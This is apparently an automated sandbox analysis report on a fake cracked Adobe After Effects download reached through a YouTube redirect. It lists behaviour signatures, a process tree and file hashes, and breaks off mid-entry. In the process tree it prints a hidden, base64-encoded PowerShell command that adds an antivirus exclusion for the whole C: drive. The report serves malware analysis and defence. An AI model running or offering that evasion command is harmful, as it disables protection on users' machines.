Analysis

  • max time kernel
    1041s
  • max time network
    1045s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/01/2023, 16:14

General

  • Target

    https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbjdjY2x2QnBESHVCTGpBQ3VoODBOOUd5X3NGZ3xBQ3Jtc0ttc19uRDVKZ1NiM0hlWlJBSWRqS0hjaVhIaGVkWmp5dF8zTC13WDl5R0tqcWlFQy1pcWxEbWZ6TTJJSXFtY0V6MDlPdExIcUs4RzJmLU1qSV9hTHM3U2dRNlFQUkctYnhXbEJfTV9nUWdZdjkyWkJqUQ&q=https%3A%2F%2Fone-clickr.cc%2Fadobeaftereffects&v=JJZwHzx1Xlk

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 7 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Drops autorun.inf file 1 TTPs 3 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Program Files directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 4 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbjdjY2x2QnBESHVCTGpBQ3VoODBOOUd5X3NGZ3xBQ3Jtc0ttc19uRDVKZ1NiM0hlWlJBSWRqS0hjaVhIaGVkWmp5dF8zTC13WDl5R0tqcWlFQy1pcWxEbWZ6TTJJSXFtY0V6MDlPdExIcUs4RzJmLU1qSV9hTHM3U2dRNlFQUkctYnhXbEJfTV9nUWdZdjkyWkJqUQ&q=https%3A%2F%2Fone-clickr.cc%2Fadobeaftereffects&v=JJZwHzx1Xlk
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3300
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff831904f50,0x7ff831904f60,0x7ff831904f70
      2⤵
        PID:4308
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1612 /prefetch:2
        2⤵
          PID:4356
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1860 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4700
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:8
          2⤵
            PID:3776
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
            2⤵
              PID:4668
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
              2⤵
                PID:3432
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:8
                2⤵
                  PID:4000
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2892
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:8
                  2⤵
                    PID:3184
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:8
                    2⤵
                      PID:3360
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
                      2⤵
                        PID:3760
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4948
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
                        2⤵
                          PID:1152
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2000
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:804
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4496
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:8
                          2⤵
                            PID:4080
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1620
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2316 /prefetch:8
                            2⤵
                              PID:1992
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2348 /prefetch:2
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4948
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
                              2⤵
                                PID:3744
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1568 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3572
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4280 /prefetch:8
                                2⤵
                                  PID:3760
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1856 /prefetch:8
                                  2⤵
                                    PID:804
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4372 /prefetch:8
                                    2⤵
                                      PID:4160
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3024 /prefetch:8
                                      2⤵
                                        PID:344
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1396 /prefetch:8
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4400
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
                                        2⤵
                                          PID:8
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
                                          2⤵
                                            PID:1188
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
                                            2⤵
                                              PID:1256
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2972 /prefetch:8
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4392
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:8
                                              2⤵
                                                PID:2256
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4920 /prefetch:8
                                                2⤵
                                                  PID:4380
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,15040824276689642028,14661969543135668883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5048 /prefetch:8
                                                  2⤵
                                                    PID:1264
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:1360
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
                                                    1⤵
                                                    • Drops file in Program Files directory
                                                    PID:3560
                                                    • C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3560_858250286\ChromeRecovery.exe
                                                      "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3560_858250286\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={cb4a9aee-346c-4f4f-8fea-0ddce49a7aab} --system
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:2892
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                    1⤵
                                                      PID:1756
                                                    • C:\Program Files\7-Zip\7zG.exe
                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\" -spe -an -ai#7zMap20074:118:7zEvent23541
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2836
                                                    • C:\Program Files\7-Zip\7zG.exe
                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\" -spe -an -ai#7zMap2204:156:7zEvent16213
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4536
                                                    • C:\Program Files\7-Zip\7zG.exe
                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\" -spe -an -ai#7zMap23768:156:7zEvent10476
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4496
                                                    • C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe
                                                      "C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:3748
                                                      • C:\Users\Admin\AppData\Local\Temp\is-Q15B1.tmp\Adobe.After.Effects.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-Q15B1.tmp\Adobe.After.Effects.tmp" /SL5="$70270,1644573423,912384,C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        • Loads dropped DLL
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4712
                                                        • C:\Users\Admin\AppData\Local\Temp\is-FT0M0.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-FT0M0.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Drops autorun.inf file
                                                          PID:364
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LauncherWC\main.bat" "
                                                          3⤵
                                                            PID:2936
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex alLSigNeD -NOl -w hIdDEn -EC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXAAnACkA
                                                              4⤵
                                                                PID:4852
                                                        • C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe
                                                          "C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:5048
                                                          • C:\Users\Admin\AppData\Local\Temp\is-PNORC.tmp\Adobe.After.Effects.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-PNORC.tmp\Adobe.After.Effects.tmp" /SL5="$60320,1644573423,912384,C:\Users\Admin\Downloads\Adobe.After.Effects_pass1234\Adobe.After.Effects\Adobe.After.Effects.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks computer location settings
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2332
                                                            • C:\Users\Admin\AppData\Local\Temp\is-CF2IS.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-CF2IS.tmp\Adobe.After.Effects.2023.v23.0.0.59.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Drops autorun.inf file
                                                              PID:824
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LauncherWC\main.bat" "
                                                              3⤵
                                                                PID:3508
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex alLSigNeD -NOl -w hIdDEn -EC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXAAnACkA
                                                                  4⤵
                                                                    PID:4384

                                                            Network

                                                            MITRE ATT&CK Enterprise v6

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3560_858250286\ChromeRecovery.exe

                                                              Filesize

                                                              253KB

                                                              MD5

                                                              49ac3c96d270702a27b4895e4ce1f42a

                                                              SHA1

                                                              55b90405f1e1b72143c64113e8bc65608dd3fd76

                                                              SHA256

                                                              82aa3fd6a25cda9e16689cfadea175091be010cecae537e517f392e0bef5ba0f

                                                              SHA512

                                                              b62f6501cb4c992d42d9097e356805c88ac4ac5a46ead4a8eee9f8cbae197b2305da8aab5b4a61891fe73951588025f2d642c32524b360687993f98c913138a0

                                                            • C:\ProgramData\LauncherWC\7za.exe

                                                              Filesize

                                                              796KB

                                                              MD5

                                                              90aac6489f6b226bf7dc1adabfdb1259

                                                              SHA1

                                                              c90c47b717b776922cdd09758d2b4212d9ae4911

                                                              SHA256

                                                              ba7f3627715614d113c1e1cd7dd9d47e3402a1e8a7404043e08bc14939364549

                                                              SHA512

                                                              befaa9b27dc11e226b00a651aa91cbfe1ec36127084d87d44b6cd8a5076e0a092a162059295d3fcd17abb6ea9adb3b703f3652ae558c2eef4e8932131397c12d

                                                            • C:\ProgramData\LauncherWC\main.bat

                                                              Filesize

                                                              276KB

                                                              MD5

                                                              76486a77a238f18979c948c491d402ce

                                                              SHA1

                                                              14933d50d304b4fc36f057177aebe9dbaa3a22b7

                                                              SHA256

                                                              cfca5d912f6a8eba1282d4c9230f403e5c061486dac3470225ef0ea6db608cff

                                                              SHA512

                                                              c642219feb7d0e5445f6aeac9243f8ce6285242c9adaeda94021b3c879a6cea67c60c713a93cb17aef9d208a47df00839d34dda1eda78fa0e88bd005731cc0cc

                                                            • C:\ProgramData\LauncherWC\main.bat

                                                              Filesize

                                                              276KB

                                                              MD5

                                                              76486a77a238f18979c948c491d402ce

                                                              SHA1

                                                              14933d50d304b4fc36f057177aebe9dbaa3a22b7

                                                              SHA256

                                                              cfca5d912f6a8eba1282d4c9230f403e5c061486dac3470225ef0ea6db608cff

                                                              SHA512

                                                              c642219feb7d0e5445f6aeac9243f8ce6285242c9adaeda94021b3c879a6cea67c60c713a93cb17aef9d208a47df00839d34dda1eda78fa0e88bd005731cc0cc

                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.141\Recovery.crx3

                                                              Filesize

                                                              141KB

                                                              MD5

                                                              ea1c1ffd3ea54d1fb117bfdbb3569c60

                                                              SHA1

                                                              10958b0f690ae8f5240e1528b1ccffff28a33272

                                                              SHA256

                                                              7c3a6a7d16ac44c3200f572a764bce7d8fa84b9572dd028b15c59bdccbc0a77d

                                                              SHA512

                                                              6c30728cac9eac53f0b27b7dbe2222da83225c3b63617d6b271a6cfedf18e8f0a8dffa1053e1cbc4c5e16625f4bbc0d03aa306a946c9d72faa4ceb779f8ffcaf

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\AUTORUN.exe

                                                              Filesize

                                                              4.2MB

                                                              MD5

                                                              2853ab6cdb5cc6695ebfb429eb2db2d7

                                                              SHA1

                                                              058c4dab7b124166c3f377171026978b5646e4b9

                                                              SHA256

                                                              751759b739adb7dc69d7e9f91e0ca0ab9a6f4b937b25c0e86095953e2153c3ab

                                                              SHA512

                                                              e455e29004ce485880bbbdfc1a2320c6e0298516013d30c8f4982bb04ddbf0ea398cac5259923bdb404aa92576dcd31c4ecdb3900fd353dd7dd704310a136e80

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\AUTORUN.inf

                                                              Filesize

                                                              64B

                                                              MD5

                                                              bc852476e9d547a00708e7ba73d4b989

                                                              SHA1

                                                              25b2fb078265eb847d0653b91c178d9940a0520f

                                                              SHA256

                                                              520476a9bba5ce51461f207badb2b282446ea20dc0b7194e6da0c5c217fdc816

                                                              SHA512

                                                              3fcf075b13aa03ef81e518a75844fdd091d394646725a3bb8d91d657f2306b27b508b1783b3450d291675fcde3f0aa0ae3ddd2f47bac42f84b5533c35f9c242f

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\Helper.exe

                                                              Filesize

                                                              15.8MB

                                                              MD5

                                                              c08c095f422d02358a53ffbcb72febc1

                                                              SHA1

                                                              4519844038eb3aa089f6f973a7da17f508058fcd

                                                              SHA256

                                                              6ea26dc624d903ab1359dc0dfb9c32cd1523f65511d5bcc7e13ac92ba469c482

                                                              SHA512

                                                              5184a7ebeaa7ffc7603284641e3f8c88dba41e7135274378fe5314c9e78289067cfb8da706b4534277d8e284fc0f73be10c0afc19873cc8d518c08424fd2d2db

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\Helper.exe

                                                              Filesize

                                                              15.0MB

                                                              MD5

                                                              fd385177a4ac36d7c9fb515634cec192

                                                              SHA1

                                                              3b9943a210db85d79c3cba8b50a841e1aaf4d16d

                                                              SHA256

                                                              27c79457e7703d7d6661f29099f707eba2d27b2015723f70ac8120c9cd3fe092

                                                              SHA512

                                                              8c671aa42cc1029e534077e60decbd9c124c3605edd00e0e5585d5226a22d7dbfa6edd79ea175668d234319e90020cc6cfcdfe31359b5fdebf6d3b1524bb6747

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\ReleaseInformation_en.rtf

                                                              Filesize

                                                              50KB

                                                              MD5

                                                              f59c4e77563830f5a9c85092bf996fa0

                                                              SHA1

                                                              73f99b9a205a54e5c97ee63cd5af3e70fb83dfd4

                                                              SHA256

                                                              9d88d5cebab1d55c6e1d5d348c867881d21833291779a40a48b6169557178003

                                                              SHA512

                                                              edfcd2cb169a4277fce0e180a935e973abfd6745971985e664f4c1b5a2d179e9592d238936bc6ff2f4d0869e2f76b499037c5fb4d5035f6e85bdfa28b676c159

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\ReleaseInformation_ru.rtf

                                                              Filesize

                                                              57KB

                                                              MD5

                                                              dd05b3bd855b92a20ca79f3fad3fdc5c

                                                              SHA1

                                                              ef7ec47d423f11f4f0bdc9ef3b93e36d759dd199

                                                              SHA256

                                                              ab95bab3411acf52cf109c3358f1a44ec579a227fbba494fac4ef1dec63eed0d

                                                              SHA512

                                                              d7da241f68fb21d1ef64e20baadf7f4286e0152769a78e254da863ae91b7fc4dc7ed2b5a1f492232039ce581c05d49a0762b4244f98d336529732aaf1cb97262

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\VCR.exe

                                                              Filesize

                                                              14.8MB

                                                              MD5

                                                              21266fd31d3122a5b649c75d23d4ab93

                                                              SHA1

                                                              a4d39926a202bba33b0f9f5f8a7ac058e59bd2a7

                                                              SHA256

                                                              f00b5ce4e777d911edcfb54058c43feb5c7d858796365421c773f79104d9dd57

                                                              SHA512

                                                              c60ccf6d30937b49d24c53d9ecb7e99c5170cefd9df444ad3c409cdd82d7200eb268972d6009bc561d4ca29623a0939dd2fa2987ab6ed94de2a125f8e3d9c86a

                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\AfterEffects2023\install\VCR.exe

                                                              Filesize

                                                              13.2MB

                                                              MD5

                                                              9bc6705e8413da2d5af3a485ae298724

                                                              SHA1

